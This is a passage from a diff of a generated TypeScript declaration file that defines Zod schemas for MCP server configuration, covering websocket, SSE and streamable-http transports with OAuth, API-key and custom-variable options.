+ }, "strip", z.ZodTypeAny, {
1215
+ authorization_url?: string | undefined;
1216
+ token_url?: string | undefined;
1217
+ client_id?: string | undefined;
1218
+ client_secret?: string | undefined;
1219
+ scope?: string | undefined;
1220
+ redirect_uri?: string | undefined;
1221
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1222
+ grant_types_supported?: string[] | undefined;
1223
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1224
+ response_types_supported?: string[] | undefined;
1225
+ code_challenge_methods_supported?: string[] | undefined;
1226
+ skip_code_challenge_check?: boolean | undefined;
1227
+ revocation_endpoint?: string | undefined;
1228
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1229
+ }, {
1230
+ authorization_url?: string | undefined;
1231
+ token_url?: string | undefined;
1232
+ client_id?: string | undefined;
1233
+ client_secret?: string | undefined;
1234
+ scope?: string | undefined;
1235
+ redirect_uri?: string | undefined;
1236
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1237
+ grant_types_supported?: string[] | undefined;
1238
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1239
+ response_types_supported?: string[] | undefined;
1240
+ code_challenge_methods_supported?: string[] | undefined;
1241
+ skip_code_challenge_check?: boolean | undefined;
1242
+ revocation_endpoint?: string | undefined;
1243
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1244
+ }>>;
1245
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
1246
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
1247
+ /**
1248
+ * API Key authentication configuration for SSE and Streamable HTTP transports
1249
+ * - source: 'admin' means the key is provided by admin and shared by all users
1250
+ * - source: 'user' means each user provides their own key via customUserVars
1251
+ */
1252
+ apiKey: z.ZodOptional<z.ZodObject<{
1253
+ /** API key value (only for admin-provided mode, stored encrypted) */
1254
+ key: z.ZodOptional<z.ZodString>;
1255
+ /** Whether key is provided by admin or each user */
1256
+ source: z.ZodEnum<["admin", "user"]>;
1257
+ /** How to format the authorization header */
1258
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
1259
+ /** Custom header name when authorization_type is 'custom' */
1260
+ custom_header: z.ZodOptional<z.ZodString>;
1261
+ }, "strip", z.ZodTypeAny, {
1262
+ source: "admin" | "user";
1263
+ authorization_type: "custom" | "basic" | "bearer";
1264
+ key?: string | undefined;
1265
+ custom_header?: string | undefined;
1266
+ }, {
1267
+ source: "admin" | "user";
1268
+ authorization_type: "custom" | "basic" | "bearer";
1269
+ key?: string | undefined;
1270
+ custom_header?: string | undefined;
1271
+ }>>;
1272
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
1273
+ title: z.ZodString;
1274
+ description: z.ZodString;
1275
+ }, "strip", z.ZodTypeAny, {
1276
+ title: string;
1277
+ description: string;
1278
+ }, {
1279
+ title: string;
1280
+ description: string;
1281
+ }>>>;
1282
+ } & {
1283
+ type: z.ZodDefault<z.ZodLiteral<"websocket">>;
1284
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
1285
+ }, "strip", z.ZodTypeAny, {
1286
+ type: "websocket";
1287
+ url: string;
1288
+ title?: string | undefined;
1289
+ description?: string | undefined;
1290
+ startup?: boolean | undefined;
1291
+ iconPath?: string | undefined;
1292
+ timeout?: number | undefined;
1293
+ sseReadTimeout?: number | undefined;
1294
+ initTimeout?: number | undefined;
1295
+ chatMenu?: boolean | undefined;
1296
+ serverInstructions?: string | boolean | undefined;
1297
+ requiresOAuth?: boolean | undefined;
1298
+ oauth?: {
1299
+ authorization_url?: string | undefined;
1300
+ token_url?: string | undefined;
1301
+ client_id?: string | undefined;
1302
+ client_secret?: string | undefined;
1303
+ scope?: string | undefined;
1304
+ redirect_uri?: string | undefined;
1305
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1306
+ grant_types_supported?: string[] | undefined;
1307
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1308
+ response_types_supported?: string[] | undefined;
1309
+ code_challenge_methods_supported?: string[] | undefined;
1310
+ skip_code_challenge_check?: boolean | undefined;
1311
+ revocation_endpoint?: string | undefined;
1312
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1313
+ } | undefined;
1314
+ oauth_headers?: Record<string, string> | undefined;
1315
+ apiKey?: {
1316
+ source: "admin" | "user";
1317
+ authorization_type: "custom" | "basic" | "bearer";
1318
+ key?: string | undefined;
1319
+ custom_header?: string | undefined;
1320
+ } | undefined;
1321
+ customUserVars?: Record<string, {
1322
+ title: string;
1323
+ description: string;
1324
+ }> | undefined;
1325
+ }, {
1326
+ url: string;
1327
+ title?: string | undefined;
1328
+ description?: string | undefined;
1329
+ startup?: boolean | undefined;
1330
+ iconPath?: string | undefined;
1331
+ timeout?: number | undefined;
1332
+ sseReadTimeout?: number | undefined;
1333
+ initTimeout?: number | undefined;
1334
+ chatMenu?: boolean | undefined;
1335
+ type?: "websocket" | undefined;
1336
+ serverInstructions?: string | boolean | undefined;
1337
+ requiresOAuth?: boolean | undefined;
1338
+ oauth?: {
1339
+ authorization_url?: string | undefined;
1340
+ token_url?: string | undefined;
1341
+ client_id?: string | undefined;
1342
+ client_secret?: string | undefined;
1343
+ scope?: string | undefined;
1344
+ redirect_uri?: string | undefined;
1345
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1346
+ grant_types_supported?: string[] | undefined;
1347
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1348
+ response_types_supported?: string[] | undefined;
1349
+ code_challenge_methods_supported?: string[] | undefined;
1350
+ skip_code_challenge_check?: boolean | undefined;
1351
+ revocation_endpoint?: string | undefined;
1352
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1353
+ } | undefined;
1354
+ oauth_headers?: Record<string, string> | undefined;
1355
+ apiKey?: {
1356
+ source: "admin" | "user";
1357
+ authorization_type: "custom" | "basic" | "bearer";
1358
+ key?: string | undefined;
1359
+ custom_header?: string | undefined;
1360
+ } | undefined;
1361
+ customUserVars?: Record<string, {
1362
+ title: string;
1363
+ description: string;
1364
+ }> | undefined;
1365
+ }>, z.ZodObject<{
1366
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
1367
+ title: z.ZodOptional<z.ZodString>;
1368
+ /** Description of the MCP server */
1369
+ description: z.ZodOptional<z.ZodString>;
1370
+ /**
1371
+ * Controls whether the MCP server is initialized during application startup.
1372
+ * - true (default): Server is initialized during app startup and included in app-level connections
1373
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
1374
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
1375
+ */
1376
+ startup: z.ZodOptional<z.ZodBoolean>;
1377
+ iconPath: z.ZodOptional<z.ZodString>;
1378
+ timeout: z.ZodOptional<z.ZodNumber>;
1379
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
1380
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
1381
+ initTimeout: z.ZodOptional<z.ZodNumber>;
1382
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
1383
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
1384
+ /**
1385
+ * Controls server instruction behavior:
1386
+ * - undefined/not set: No instructions included (default)
1387
+ * - true: Use server-provided instructions
1388
+ * - string: Use custom instructions (overrides server-provided)
1389
+ */
1390
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
1391
+ /**
1392
+ * Whether this server requires OAuth authentication
1393
+ * If not specified, will be auto-detected during construction
1394
+ */
1395
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
1396
+ /**
1397
+ * OAuth configuration for SSE and Streamable HTTP transports
1398
+ * - Optional: OAuth can be auto-discovered on 401 responses
1399
+ * - Pre-configured values will skip discovery steps
1400
+ */
1401
+ oauth: z.ZodOptional<z.ZodObject<{
1402
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
1403
+ authorization_url: z.ZodOptional<z.ZodString>;
1404
+ /** OAuth token endpoint (optional - can be auto-discovered) */
1405
+ token_url: z.ZodOptional<z.ZodString>;
1406
+ /** OAuth client ID (optional - can use dynamic registration) */
1407
+ client_id: z.ZodOptional<z.ZodString>;
1408
+ /** OAuth client secret (optional - can use dynamic registration) */
1409
+ client_secret: z.ZodOptional<z.ZodString>;
1410
+ /** OAuth scopes to request */
1411
+ scope: z.ZodOptional<z.ZodString>;
1412
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
1413
+ redirect_uri: z.ZodOptional<z.ZodString>;
1414
+ /** Token exchange method */
1415
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
1416
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
1417
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1418
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
1419
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1420
+ /** Supported response types (defaults to ['code']) */
1421
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1422
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
1423
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1424
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
1425
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
1426
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
1427
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
1428
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
1429
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1430
+ }, "strip", z.ZodTypeAny, {
1431
+ authorization_url?: string | undefined;
1432
+ token_url?: string | undefined;
1433
+ client_id?: string | undefined;
1434
+ client_secret?: string | undefined;
1435
+ scope?: string | undefined;
1436
+ redirect_uri?: string | undefined;
1437
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1438
+ grant_types_supported?: string[] | undefined;
1439
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1440
+ response_types_supported?: string[] | undefined;
1441
+ code_challenge_methods_supported?: string[] | undefined;
1442
+ skip_code_challenge_check?: boolean | undefined;
1443
+ revocation_endpoint?: string | undefined;
1444
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1445
+ }, {
1446
+ authorization_url?: string | undefined;
1447
+ token_url?: string | undefined;
1448
+ client_id?: string | undefined;
1449
+ client_secret?: string | undefined;
1450
+ scope?: string | undefined;
1451
+ redirect_uri?: string | undefined;
1452
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1453
+ grant_types_supported?: string[] | undefined;
1454
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1455
+ response_types_supported?: string[] | undefined;
1456
+ code_challenge_methods_supported?: string[] | undefined;
1457
+ skip_code_challenge_check?: boolean | undefined;
1458
+ revocation_endpoint?: string | undefined;
1459
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1460
+ }>>;
1461
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
1462
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
1463
+ /**
1464
+ * API Key authentication configuration for SSE and Streamable HTTP transports
1465
+ * - source: 'admin' means the key is provided by admin and shared by all users
1466
+ * - source: 'user' means each user provides their own key via customUserVars
1467
+ */
1468
+ apiKey: z.ZodOptional<z.ZodObject<{
1469
+ /** API key value (only for admin-provided mode, stored encrypted) */
1470
+ key: z.ZodOptional<z.ZodString>;
1471
+ /** Whether key is provided by admin or each user */
1472
+ source: z.ZodEnum<["admin", "user"]>;
1473
+ /** How to format the authorization header */
1474
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
1475
+ /** Custom header name when authorization_type is 'custom' */
1476
+ custom_header: z.ZodOptional<z.ZodString>;
1477
+ }, "strip", z.ZodTypeAny, {
1478
+ source: "admin" | "user";
1479
+ authorization_type: "custom" | "basic" | "bearer";
1480
+ key?: string | undefined;
1481
+ custom_header?: string | undefined;
1482
+ }, {
1483
+ source: "admin" | "user";
1484
+ authorization_type: "custom" | "basic" | "bearer";
1485
+ key?: string | undefined;
1486
+ custom_header?: string | undefined;
1487
+ }>>;
1488
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
1489
+ title: z.ZodString;
1490
+ description: z.ZodString;
1491
+ }, "strip", z.ZodTypeAny, {
1492
+ title: string;
1493
+ description: string;
1494
+ }, {
1495
+ title: string;
1496
+ description: string;
1497
+ }>>>;
1498
+ } & {
1499
+ type: z.ZodDefault<z.ZodLiteral<"sse">>;
1500
+ headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
1501
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
1502
+ }, "strip", z.ZodTypeAny, {
1503
+ type: "sse";
1504
+ url: string;
1505
+ title?: string | undefined;
1506
+ description?: string | undefined;
1507
+ startup?: boolean | undefined;
1508
+ iconPath?: string | undefined;
1509
+ timeout?: number | undefined;
1510
+ sseReadTimeout?: number | undefined;
1511
+ initTimeout?: number | undefined;
1512
+ chatMenu?: boolean | undefined;
1513
+ serverInstructions?: string | boolean | undefined;
1514
+ requiresOAuth?: boolean | undefined;
1515
+ oauth?: {
1516
+ authorization_url?: string | undefined;
1517
+ token_url?: string | undefined;
1518
+ client_id?: string | undefined;
1519
+ client_secret?: string | undefined;
1520
+ scope?: string | undefined;
1521
+ redirect_uri?: string | undefined;
1522
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1523
+ grant_types_supported?: string[] | undefined;
1524
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1525
+ response_types_supported?: string[] | undefined;
1526
+ code_challenge_methods_supported?: string[] | undefined;
1527
+ skip_code_challenge_check?: boolean | undefined;
1528
+ revocation_endpoint?: string | undefined;
1529
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1530
+ } | undefined;
1531
+ oauth_headers?: Record<string, string> | undefined;
1532
+ apiKey?: {
1533
+ source: "admin" | "user";
1534
+ authorization_type: "custom" | "basic" | "bearer";
1535
+ key?: string | undefined;
1536
+ custom_header?: string | undefined;
1537
+ } | undefined;
1538
+ customUserVars?: Record<string, {
1539
+ title: string;
1540
+ description: string;
1541
+ }> | undefined;
1542
+ headers?: Record<string, string> | undefined;
1543
+ }, {
1544
+ url: string;
1545
+ title?: string | undefined;
1546
+ description?: string | undefined;
1547
+ startup?: boolean | undefined;
1548
+ iconPath?: string | undefined;
1549
+ timeout?: number | undefined;
1550
+ sseReadTimeout?: number | undefined;
1551
+ initTimeout?: number | undefined;
1552
+ chatMenu?: boolean | undefined;
1553
+ type?: "sse" | undefined;
1554
+ serverInstructions?: string | boolean | undefined;
1555
+ requiresOAuth?: boolean | undefined;
1556
+ oauth?: {
1557
+ authorization_url?: string | undefined;
1558
+ token_url?: string | undefined;
1559
+ client_id?: string | undefined;
1560
+ client_secret?: string | undefined;
1561
+ scope?: string | undefined;
1562
+ redirect_uri?: string | undefined;
1563
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1564
+ grant_types_supported?: string[] | undefined;
1565
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1566
+ response_types_supported?: string[] | undefined;
1567
+ code_challenge_methods_supported?: string[] | undefined;
1568
+ skip_code_challenge_check?: boolean | undefined;
1569
+ revocation_endpoint?: string | undefined;
1570
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1571
+ } | undefined;
1572
+ oauth_headers?: Record<string, string> | undefined;
1573
+ apiKey?: {
1574
+ source: "admin" | "user";
1575
+ authorization_type: "custom" | "basic" | "bearer";
1576
+ key?: string | undefined;
1577
+ custom_header?: string | undefined;
1578
+ } | undefined;
1579
+ customUserVars?: Record<string, {
1580
+ title: string;
1581
+ description: string;
1582
+ }> | undefined;
1583
+ headers?: Record<string, string> | undefined;
1584
+ }>, z.ZodObject<{
1585
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
1586
+ title: z.ZodOptional<z.ZodString>;
1587
+ /** Description of the MCP server */
1588
+ description: z.ZodOptional<z.ZodString>;
1589
+ /**
1590
+ * Controls whether the MCP server is initialized during application startup.
1591
+ * - true (default): Server is initialized during app startup and included in app-level connections
1592
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
1593
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
1594
+ */
1595
+ startup: z.ZodOptional<z.ZodBoolean>;
1596
+ iconPath: z.ZodOptional<z.ZodString>;
1597
+ timeout: z.ZodOptional<z.ZodNumber>;
1598
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
1599
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
1600
+ initTimeout: z.ZodOptional<z.ZodNumber>;
1601
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
1602
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
1603
+ /**
1604
+ * Controls server instruction behavior:
1605
+ * - undefined/not set: No instructions included (default)
1606
+ * - true: Use server-provided instructions
1607
+ * - string: Use custom instructions (overrides server-provided)
1608
+ */
1609
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
1610
+ /**
1611
+ * Whether this server requires OAuth authentication
1612
+ * If not specified, will be auto-detected during construction
1613
+ */
1614
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
1615
+ /**
1616
+ * OAuth configuration for SSE and Streamable HTTP transports
1617
+ * - Optional: OAuth can be auto-discovered on 401 responses
1618
+ * - Pre-configured values will skip discovery steps
1619
+ */
1620
+ oauth: z.ZodOptional<z.ZodObject<{
1621
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
1622
+ authorization_url: z.ZodOptional<z.ZodString>;
1623
+ /** OAuth token endpoint (optional - can be auto-discovered) */
1624
+ token_url: z.ZodOptional<z.ZodString>;
1625
+ /** OAuth client ID (optional - can use dynamic registration) */
1626
+ client_id: z.ZodOptional<z.ZodString>;
1627
+ /** OAuth client secret (optional - can use dynamic registration) */
1628
+ client_secret: z.ZodOptional<z.ZodString>;
1629
+ /** OAuth scopes to request */
1630
+ scope: z.ZodOptional<z.ZodString>;
1631
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
1632
+ redirect_uri: z.ZodOptional<z.ZodString>;
1633
+ /** Token exchange method */
1634
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
1635
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
1636
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1637
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
1638
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1639
+ /** Supported response types (defaults to ['code']) */
1640
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1641
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
1642
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1643
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
1644
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
1645
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
1646
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
1647
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
1648
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1649
+ }, "strip", z.ZodTypeAny, {
1650
+ authorization_url?: string | undefined;
1651
+ token_url?: string | undefined;
1652
+ client_id?: string | undefined;
1653
+ client_secret?: string | undefined;
1654
+ scope?: string | undefined;
1655
+ redirect_uri?: string | undefined;
1656
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1657
+ grant_types_supported?: string[] | undefined;
1658
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1659
+ response_types_supported?: string[] | undefined;
1660
+ code_challenge_methods_supported?: string[] | undefined;
1661
+ skip_code_challenge_check?: boolean | undefined;
1662
+ revocation_endpoint?: string | undefined;
1663
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1664
+ }, {
1665
+ authorization_url?: string | undefined;
1666
+ token_url?: string | undefined;
1667
+ client_id?: string | undefined;
1668
+ client_secret?: string | undefined;
1669
+ scope?: string | undefined;
1670
+ redirect_uri?: string | undefined;
1671
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1672
+ grant_types_supported?: string[] | undefined;
1673
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1674
+ response_types_supported?: string[] | undefined;
1675
+ code_challenge_methods_supported?: string[] | undefined;
1676
+ skip_code_challenge_check?: boolean | undefined;
1677
+ revocation_endpoint?: string | undefined;
1678
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1679
+ }>>;
1680
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
1681
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
1682
+ /**
1683
+ * API Key authentication configuration for SSE and Streamable HTTP transports
1684
+ * - source: 'admin' means the key is provided by admin and shared by all users
1685
+ * - source: 'user' means each user provides their own key via customUserVars
1686
+ */
1687
+ apiKey: z.ZodOptional<z.ZodObject<{
1688
+ /** API key value (only for admin-provided mode, stored encrypted) */
1689
+ key: z.ZodOptional<z.ZodString>;
1690
+ /** Whether key is provided by admin or each user */
1691
+ source: z.ZodEnum<["admin", "user"]>;
1692
+ /** How to format the authorization header */
1693
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
1694
+ /** Custom header name when authorization_type is 'custom' */
1695
+ custom_header: z.ZodOptional<z.ZodString>;
1696
+ }, "strip", z.ZodTypeAny, {
1697
+ source: "admin" | "user";
1698
+ authorization_type: "custom" | "basic" | "bearer";
1699
+ key?: string | undefined;
1700
+ custom_header?: string | undefined;
1701
+ }, {
1702
+ source: "admin" | "user";
1703
+ authorization_type: "custom" | "basic" | "bearer";
1704
+ key?: string | undefined;
1705
+ custom_header?: string | undefined;
1706
+ }>>;
1707
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
1708
+ title: z.ZodString;
1709
+ description: z.ZodString;
1710
+ }, "strip", z.ZodTypeAny, {
1711
+ title: string;
1712
+ description: string;
1713
+ }, {
1714
+ title: string;
1715
+ description: string;
1716
+ }>>>;
1717
+ } & {
1718
+ type: z.ZodUnion<[z.ZodLiteral<"streamable-http">, z.ZodLiteral<"http">]>;
1719
+ headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
1720
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
1721
+ }, "strip", z.ZodTypeAny, {
1722
+ type: "streamable-http" | "http";
1723
+ url: string;
1724
+ title?: string | undefined;
1725
+ description?: string | undefined;
1726
+ startup?: boolean | undefined;
1727
+ iconPath?: string | undefined;
1728
+ timeout?: number | undefined;
1729
+ sseReadTimeout?: number | undefined;
1730
+ initTimeout?: number | undefined;
1731
+ chatMenu?: boolean | undefined;
1732
+ serverInstructions?: string | boolean | undefined;
1733
+ requiresOAuth?: boolean | undefined;
1734
+ oauth?: {
1735
+ authorization_url?: string | undefined;
1736
+ token_url?: string | undefined;
1737
+ client_id?: string | undefined;
1738
+ client_secret?: string | undefined;
1739
+ scope?: string | undefined;
1740
+ redirect_uri?: string | undefined;
1741
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1742
+ grant_types_supported?: string[] | undefined;
1743
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1744
+ response_types_supported?: string[] | undefined;
1745
+ code_challenge_methods_supported?: string[] | undefined;
1746
+ skip_code_challenge_check?: boolean | undefined;
1747
+ revocation_endpoint?: string | undefined;
1748
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1749
+ } | undefined;
1750
+ oauth_headers?: Record<string, string> | undefined;
1751
+ apiKey?: {
1752
+ source: "admin" | "user";
1753
+ authorization_type: "custom" | "basic" | "bearer";
1754
+ key?: string | undefined;
1755
+ custom_header?: string | undefined;
1756
+ } | undefined;
1757
+ customUserVars?: Record<string, {
1758
+ title: string;
1759
+ description: string;
1760
+ }> | undefined;
1761
+ headers?: Record<string, string> | undefined;
1762
+ }, {
1763
+ type: "streamable-http" | "http";
1764
+ url: string;
1765
+ title?: string | undefined;
1766
+ description?: string | undefined;
1767
+ startup?: boolean | undefined;
1768
+ iconPath?: string | undefined;
1769
+ timeout?: number | undefined;
1770
+ sseReadTimeout?: number | undefined;
1771
+ initTimeout?: number | undefined;
1772
+ chatMenu?: boolean | undefined;
1773
+ serverInstructions?: string | boolean | undefined;
1774
+ requiresOAuth?: boolean | undefined;
1775
+ oauth?: {
1776
+ authorization_url?: string | undefined;
1777
+ token_url?: string | undefined;
1778
+ client_id?: string | undefined;
1779
+ client_secret?: string | undefined;
1780
+ scope?: string | undefined;
1781
+ redirect_uri?: string | undefined;
1782
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
1783
+ grant_types_supported?: string[] | undefined;
1784
+ token_endpoint_auth_methods_supported?: string[] | undefined;
1785
+ response_types_supported?: string[] | undefined;
1786
+ code_challenge_methods_supported?: string[] | undefined;
1787
+ skip_code_challenge_check?: boolean | undefined;
1788
+ revocation_endpoint?: string | undefined;
1789
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
1790
+ } | undefined;
1791
+ oauth_headers?: Record<string, string> | undefined;
1792
+ apiKey?: {
1793
+ source: "admin" | "user";
1794
+ authorization_type: "custom" | "basic" | "bearer";
1795
+ key?: string | undefined;
1796
+ custom_header?: string | undefined;
1797
+ } | undefined;
1798
+ customUserVars?: Record<string, {
1799
+ title: string;
1800
+ description: string;
1801
+ }> | undefined;
1802
+ headers?: Record<string, string> | undefined;
1803
+ }>]>;
1804
+ export declare const MCPServersSchema: z.ZodRecord<z.ZodString, z.ZodUnion<[z.ZodObject<{
1805
+ /** Display name for the MCP server - only letters, numbers, and spaces allowed */
1806
+ title: z.ZodOptional<z.ZodString>;
1807
+ /** Description of the MCP server */
1808
+ description: z.ZodOptional<z.ZodString>;
1809
+ /**
1810
+ * Controls whether the MCP server is initialized during application startup.
1811
+ * - true (default): Server is initialized during app startup and included in app-level connections
1812
+ * - false: Skips initialization at startup and excludes from app-level connections - useful for servers
1813
+ * requiring manual authentication (e.g., GitHub PAT tokens) that need to be configured through the UI after startup
1814
+ */
1815
+ startup: z.ZodOptional<z.ZodBoolean>;
1816
+ iconPath: z.ZodOptional<z.ZodString>;
1817
+ timeout: z.ZodOptional<z.ZodNumber>;
1818
+ /** Timeout (ms) for the long-lived SSE GET stream body before undici aborts it. Default: 300_000 (5 min). */
1819
+ sseReadTimeout: z.ZodOptional<z.ZodNumber>;
1820
+ initTimeout: z.ZodOptional<z.ZodNumber>;
1821
+ /** Controls visibility in chat dropdown menu (MCPSelect) */
1822
+ chatMenu: z.ZodOptional<z.ZodBoolean>;
1823
+ /**
1824
+ * Controls server instruction behavior:
1825
+ * - undefined/not set: No instructions included (default)
1826
+ * - true: Use server-provided instructions
1827
+ * - string: Use custom instructions (overrides server-provided)
1828
+ */
1829
+ serverInstructions: z.ZodOptional<z.ZodUnion<[z.ZodBoolean, z.ZodString]>>;
1830
+ /**
1831
+ * Whether this server requires OAuth authentication
1832
+ * If not specified, will be auto-detected during construction
1833
+ */
1834
+ requiresOAuth: z.ZodOptional<z.ZodBoolean>;
1835
+ /**
1836
+ * OAuth configuration for SSE and Streamable HTTP transports
1837
+ * - Optional: OAuth can be auto-discovered on 401 responses
1838
+ * - Pre-configured values will skip discovery steps
1839
+ */
1840
+ oauth: z.ZodOptional<z.ZodObject<{
1841
+ /** OAuth authorization endpoint (optional - can be auto-discovered) */
1842
+ authorization_url: z.ZodOptional<z.ZodString>;
1843
+ /** OAuth token endpoint (optional - can be auto-discovered) */
1844
+ token_url: z.ZodOptional<z.ZodString>;
1845
+ /** OAuth client ID (optional - can use dynamic registration) */
1846
+ client_id: z.ZodOptional<z.ZodString>;
1847
+ /** OAuth client secret (optional - can use dynamic registration) */
1848
+ client_secret: z.ZodOptional<z.ZodString>;
1849
+ /** OAuth scopes to request */
1850
+ scope: z.ZodOptional<z.ZodString>;
1851
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
1852
+ redirect_uri: z.ZodOptional<z.ZodString>;
1853
+ /** Token exchange method */
1854
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
1855
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
1856
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1857
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
1858
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1859
+ /** Supported response types (defaults to ['code']) */
1860
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1861
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
1862
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
1863
